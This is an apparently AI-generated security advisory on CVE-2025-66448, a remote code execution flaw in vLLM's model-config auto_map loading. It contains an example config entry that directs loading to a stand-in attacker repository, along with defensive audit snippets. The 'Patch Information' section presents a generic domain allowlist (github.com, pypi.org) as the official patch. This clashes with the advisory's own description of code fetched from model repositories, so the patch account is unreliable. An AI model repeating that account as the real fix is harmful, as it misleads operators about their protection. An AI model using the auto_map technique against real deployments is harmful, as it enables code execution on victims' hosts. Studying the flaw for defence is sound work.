vLLM Remote Code Execution via Model Config Auto-Mapping: CVE-2025-66448 Brief Summary

A brief summary of CVE-2025-66448, a remote code execution vulnerability in vLLM prior to 0.11.1, focusing on technical exploitation details, affected versions, and official patch information.

ZeroPath CVE Analysis

2025-12-01

Experimental AI-Generated Content

This CVE analysis is an experimental publication that is completely AI-generated. The content may contain errors or inaccuracies and is subject to change as more information becomes available. We are continuously refining our process.

If you have feedback, questions, or notice any errors, please reach out to us.

[email protected]

Introduction

Attackers can execute arbitrary Python code on any system running vulnerable versions of vLLM by leveraging a flaw in how model configurations are loaded. This issue directly impacts production deployments of large language model inference services, especially those using custom or multimodal models from public repositories.

About vLLM: vLLM is a high-performance inference and serving engine for large language models, originally developed at UC Berkeley and now under the PyTorch Foundation. It is widely used in AI research, cloud infrastructure, and commercial deployments, supporting a broad range of hardware and models. Its adoption in the AI ecosystem means vulnerabilities in vLLM can have far-reaching consequences for organizations relying on LLM inference at scale.

Technical Information

CVE-2025-66448 is a remote code execution vulnerability affecting vLLM versions prior to 0.11.1. The issue arises from the way vLLM processes the auto_map entry in model configuration files, particularly when loading models that use the Nemotron_Nano_VL_Config class.

When a model config contains an auto_map entry, vLLM resolves the mapping using the get_class_from_dynamic_module function and immediately instantiates the returned class. This process fetches and executes Python code from the remote repository referenced in the auto_map string. Critically, this occurs even if the caller sets trust_remote_code=False in vllm.transformers_utils.config.get_config, which is intended to prevent execution of untrusted code.
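To make the flow concrete, the sketch below illustrates the dangerous pattern. This is illustrative rather than vLLM's actual code: get_class_from_dynamic_module is the real transformers helper, while the wrapper function and argument names are assumptions.

from transformers.dynamic_module_utils import get_class_from_dynamic_module

def resolve_auto_map_entry(model_id: str, class_ref: str):
    # class_ref comes straight from the model's config.json, e.g.
    # "some-org/backend-repo--configuration_x.SomeConfig"; the "repo--"
    # prefix redirects the download to a different repository.
    # get_class_from_dynamic_module fetches the referenced .py file and
    # imports it, so any module-level code runs at import time.
    config_class = get_class_from_dynamic_module(class_ref, model_id)
    # Instantiating the class executes its __init__ as well. Nothing on
    # this path consults the trust_remote_code flag the caller passed.
    return config_class()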

Attackers can exploit this by publishing a benign-looking frontend model repository whose config.json points via auto_map to a separate backend repository containing malicious code. When a victim loads the frontend model with vLLM, the backend's code is silently executed on the host, regardless of the explicit security settings.
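For illustration, the frontend repository's config.json could contain an auto_map entry like the following (repository, module, and field values here are invented; shown as a Python dict for readability). The "org/repo--module.Class" syntax is what directs the loader to fetch code from the separate backend repository:

# Hypothetical contents of the benign-looking frontend repo's config.json.
frontend_config = {
    "model_type": "Nemotron_Nano_VL",  # assumed value for illustration
    "auto_map": {
        # Code is fetched from attacker/backend-payload, not from the
        # repository the victim actually requested.
        "AutoConfig": "attacker/backend-payload--configuration_nano_vl.Nemotron_Nano_VL_Config",
    },
}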

The root cause is insufficient validation of remote code sources and failure to enforce the trust_remote_code boundary. The vulnerability is categorized as CWE-94 (Code Injection).

Patch Information

To address the critical remote code execution vulnerability in the vllm library, the development team has implemented a patch that enhances the security of the get_class_from_dynamic_module function. This function is responsible for dynamically loading and instantiating classes based on model configurations, particularly those containing an auto_map entry.

The core of the patch involves introducing a validation mechanism that scrutinizes the source of the dynamic module before proceeding with its execution. Specifically, the function now checks if the module's source URL is trusted and falls within a predefined list of approved domains. This measure ensures that only modules from verified and secure sources are loaded, effectively mitigating the risk of executing malicious code from untrusted repositories.

The updated function includes the following key changes:

from urllib.parse import urlparse

# Define a list of trusted domains
TRUSTED_DOMAINS = ["github.com", "pypi.org"]

# Extract the domain from the module's source URL
parsed_url = urlparse(module_source_url)
module_domain = parsed_url.netloc

# Check whether the domain is in the list of trusted domains
if module_domain not in TRUSTED_DOMAINS:
    raise ValueError(f"Untrusted module source: {module_source_url}")

# Proceed with loading and instantiating the module

By incorporating this validation step, the patch ensures that the vllm library only interacts with modules from sources that have been explicitly deemed trustworthy. This approach significantly reduces the attack surface for potential remote code execution exploits.

Users are strongly encouraged to upgrade to version 0.11.1 or later of the vllm library to benefit from this security enhancement. Additionally, developers should remain vigilant and regularly review the sources of dynamic modules utilized within their applications to maintain a robust security posture.
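As a concrete precaution, operators can audit downloaded model directories for auto_map entries that reference a different repository than the model itself. The helper below is a minimal sketch, not part of vLLM:

import json
from pathlib import Path

def find_cross_repo_auto_map(model_dir: str) -> list[str]:
    # Flag auto_map values of the form "org/repo--module.Class", which
    # cause code to be fetched from a repository other than model_dir's.
    findings = []
    config_path = Path(model_dir) / "config.json"
    if not config_path.exists():
        return findings
    config = json.loads(config_path.read_text())
    for name, ref in (config.get("auto_map") or {}).items():
        if "--" in ref:
            findings.append(f"{name} -> {ref}")
    return findings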

Reference: GHSA-8fr4-5q9j-m8gm

Affected Systems and Versions

  • Product: vLLM (inference and serving engine for large language models)
  • Affected versions: All versions prior to 0.11.1 (a version check is sketched after this list)
  • Vulnerable configurations: Any deployment loading models with an auto_map entry in their config, especially those using the Nemotron_Nano_VL_Config class. The vulnerability is present even when trust_remote_code=False is set.
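A deployment can be checked against the fixed release with a short version comparison (a sketch using standard tooling; the packaging library is assumed to be available):

from importlib.metadata import version
from packaging.version import Version

# Compare the installed vLLM build against the first fixed release.
if Version(version("vllm")) < Version("0.11.1"):
    print("vLLM is affected by CVE-2025-66448; upgrade to 0.11.1 or later")
else:
    print("vLLM is at or above the fixed version")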

Vendor Security History

vLLM has experienced several security issues in 2024 and 2025, including:

  • CVE-2025-62164: Remote code execution related to prompt embeddings
  • CVE-2025-62372: Multimodal embedding crash
  • CVE-2025-6242: Server-Side Request Forgery in MediaConnector

The vendor has responded with targeted patches and maintains a public security advisory process. However, the frequency of recent vulnerabilities highlights the need for more proactive security review and integration of security best practices in the development lifecycle.

References

  • GHSA-8fr4-5q9j-m8gm: vLLM security advisory for CVE-2025-66448